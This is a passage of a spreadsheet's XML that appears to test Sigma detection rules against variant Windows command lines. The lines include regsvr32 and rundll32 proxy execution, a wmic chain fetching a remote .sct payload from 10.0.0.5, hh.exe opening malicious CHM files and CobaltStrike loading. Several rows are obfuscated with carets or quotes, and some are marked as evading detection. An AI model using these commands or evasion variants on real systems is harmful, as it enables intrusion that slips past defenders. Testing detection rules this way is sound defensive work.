      </c>
      <c r="C1901" s="36" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D1901" s="36" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E1901" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe  /s C:\Users\thaim\AppData\Local\Temp\shell32.jpg</t>
        </is>
      </c>
      <c r="F1901" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1901" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1901" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1901" s="4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1901" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1901" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1902" ht="15.75" customHeight="1" s="42">
      <c r="A1902" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1902" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C1902" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D1902" s="43" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E1902" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe  /s "C:\Users\thaim\AppData\Local\Temp\shell32.jpg"</t>
        </is>
      </c>
      <c r="F1902" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1902" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1902" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1902" s="4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1902" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1902" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1903" ht="15.75" customHeight="1" s="42">
      <c r="A1903" s="36" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1903" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C1903" s="36" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D1903" s="36" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E1903" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe  /s C:\Users\thaim\AppData\Local\Temp\shell32.jpg::$DATA</t>
        </is>
      </c>
      <c r="F1903" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1903" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1903" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1903" s="4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1903" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1903" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1904" ht="15.75" customHeight="1" s="42">
      <c r="A1904" s="36" t="n"/>
      <c r="B1904" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C1904" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D1904" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E1904" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F1904" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1904" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1904" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1904" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1904" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1904" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1905" ht="15.75" customHeight="1" s="42">
      <c r="A1905" s="43" t="n"/>
      <c r="B1905" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1905" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1905" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1905" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1905" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1905" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1905" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1905" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1905" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1905" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1906" ht="15.75" customHeight="1" s="42">
      <c r="A1906" s="36" t="n"/>
      <c r="B1906" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1906" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1906" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1906" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1906" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1906" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1906" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1906" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1906" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1906" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1907" ht="15.75" customHeight="1" s="42">
      <c r="A1907" s="43" t="n"/>
      <c r="B1907" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1907" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1907" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1907" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1907" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1907" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1907" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1907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907" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1907" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1908" ht="15.75" customHeight="1" s="42">
      <c r="A1908" s="36" t="n"/>
      <c r="B1908" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1908" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1908" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1908" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1908" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1908" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1908" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1908" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1908" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1908" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1909" ht="15.75" customHeight="1" s="42">
      <c r="A1909" s="43" t="n"/>
      <c r="B1909" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1909" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1909" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1909" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1909" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1909" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1909" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1909" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1909" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1909" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1910" ht="15.75" customHeight="1" s="42">
      <c r="A1910" s="43" t="n"/>
      <c r="B1910" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1910" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1910" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1910" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1910" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1910" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1910" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1910" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1910" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1910" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1911" ht="15.75" customHeight="1" s="42">
      <c r="A1911" s="43" t="n"/>
      <c r="B1911" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1911" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1911" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1911" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1911" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1911" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1911" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1911" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1911" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1911" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1912" ht="15.75" customHeight="1" s="42">
      <c r="A1912" s="43" t="n"/>
      <c r="B1912" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1912" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1912" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1912" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1912" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1912" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1912" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1912" s="43" t="n"/>
      <c r="J1912" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1912" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1913" ht="15.75" customHeight="1" s="42">
      <c r="A1913" s="43" t="n"/>
      <c r="B1913" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1913" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1913" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1913" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1913" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1913" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1913" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1913" s="36" t="n"/>
      <c r="J1913" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1913" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1914" ht="15.75" customHeight="1" s="42">
      <c r="A1914" s="43" t="n"/>
      <c r="B1914" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1914" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1914" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1914" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1914" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1914" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1914" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1914" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1914" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1914" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1915" ht="15.75" customHeight="1" s="42">
      <c r="A1915" s="43" t="n"/>
      <c r="B1915" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1915" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1915" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1915" s="36" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1915" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1915" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1915" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1915" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1915" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1915" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1916" ht="15.75" customHeight="1" s="42">
      <c r="A1916" s="43" t="n"/>
      <c r="B1916" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1916" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1916" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1916" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1916" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1916" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1916" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1916" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1916" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1916" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1917" ht="15.75" customHeight="1" s="42">
      <c r="A1917" s="43" t="n"/>
      <c r="B1917" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1917" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1917" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1917" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1917" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1917" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1917" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1917" s="36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1917" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1917" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1918" ht="15.75" customHeight="1" s="42">
      <c r="A1918" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1918" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C1918" s="36" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D1918" s="36" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E1918" s="43" t="inlineStr">
        <is>
          <t>rundll32 2.dll, StartW</t>
        </is>
      </c>
      <c r="F1918" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1918" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1918" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1918" s="43" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32 (ae9c6a7c-9521-42a6-915e-5aaa8689d529)</t>
        </is>
      </c>
      <c r="J1918" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1918" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1919" ht="15.75" customHeight="1" s="42">
      <c r="A1919" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1919" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C1919" s="36" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D1919" s="36" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E1919" s="43" t="inlineStr">
        <is>
          <t>rundll32 2.dll, "StartW"</t>
        </is>
      </c>
      <c r="F1919" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1919" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1919" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1919" s="43" t="n"/>
      <c r="J1919" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1919" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1920" ht="15.75" customHeight="1" s="42">
      <c r="A1920" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1920" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C1920" s="36" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D1920" s="36" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E1920" s="43" t="inlineStr">
        <is>
          <t>rundll32 2.dll,StartW</t>
        </is>
      </c>
      <c r="F1920" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1920" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1920" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1920" s="43" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32 (ae9c6a7c-9521-42a6-915e-5aaa8689d529)</t>
        </is>
      </c>
      <c r="J1920" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1920" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1921" ht="15.75" customHeight="1" s="42">
      <c r="A1921" s="43" t="n"/>
      <c r="B1921" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1921" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1921" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1921" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe C:\temp\custom_module.dll,Main</t>
        </is>
      </c>
      <c r="F1921" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1921" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1921" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1921" s="43" t="n"/>
      <c r="J1921" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1921" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1922" ht="15.75" customHeight="1" s="42">
      <c r="A1922" s="43" t="n"/>
      <c r="B1922" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1922" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1922" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1922" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\renamed_payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F1922" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1922" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1922" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1922" s="43" t="n"/>
      <c r="J1922" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1922" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1923" ht="15.75" customHeight="1" s="42">
      <c r="A1923" s="43" t="n"/>
      <c r="B1923" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1923" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1923" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1923" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" C:\Windows\Temp\t^m^p.bat</t>
        </is>
      </c>
      <c r="F1923" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1923" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1923" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1923" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution (95022b85-ff2a-49fa-939a-d7b8f56eeb9b)</t>
        </is>
      </c>
      <c r="J1923" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1923" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1924" ht="15.75" customHeight="1" s="42">
      <c r="A1924" s="43" t="n"/>
      <c r="B1924" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1924" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1924" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1924" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp\GTHREA~1.DLL,EntryPoint</t>
        </is>
      </c>
      <c r="F1924" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1924" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1924" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1924" s="43" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795); Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795)</t>
        </is>
      </c>
      <c r="J1924" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1924" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1925" ht="15.75" customHeight="1" s="42">
      <c r="A1925" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1925" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwutl</t>
        </is>
      </c>
      <c r="C1925" s="36" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll</t>
        </is>
      </c>
      <c r="D1925" s="36" t="inlineStr">
        <is>
          <t>9386d78a-7207-4048-9c9f-a93a7c2d1c05</t>
        </is>
      </c>
      <c r="E1925" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe pcwutl.dll,"Launch""Application" C:\WINDOWS\System32
otepad.exe</t>
        </is>
      </c>
      <c r="F1925" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1925" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1925" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1925" s="36" t="n"/>
      <c r="J1925" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1925" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1926" ht="15.75" customHeight="1" s="42">
      <c r="A1926" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1926" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwutl</t>
        </is>
      </c>
      <c r="C1926" s="36" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll</t>
        </is>
      </c>
      <c r="D1926" s="36" t="inlineStr">
        <is>
          <t>9386d78a-7207-4048-9c9f-a93a7c2d1c05</t>
        </is>
      </c>
      <c r="E1926" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe pcwutl.d""ll,LaunchApplication C:\WINDOWS\System32
otepad.exe</t>
        </is>
      </c>
      <c r="F1926" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1926" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1926" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1926" s="36" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll (9386d78a-7207-4048-9c9f-a93a7c2d1c05); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J1926" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1926" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1927" ht="15.75" customHeight="1" s="42">
      <c r="A1927" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1927" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwutl</t>
        </is>
      </c>
      <c r="C1927" s="36" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll</t>
        </is>
      </c>
      <c r="D1927" s="36" t="inlineStr">
        <is>
          <t>9386d78a-7207-4048-9c9f-a93a7c2d1c05</t>
        </is>
      </c>
      <c r="E1927" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "rundll32.exe pcwutl.dll,Launch^Application C:\WINDOWS\System32
otepad.exe"</t>
        </is>
      </c>
      <c r="F1927" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1927" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1927" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1927" s="43" t="n"/>
      <c r="J1927" s="36" t="n">
        <v>2</v>
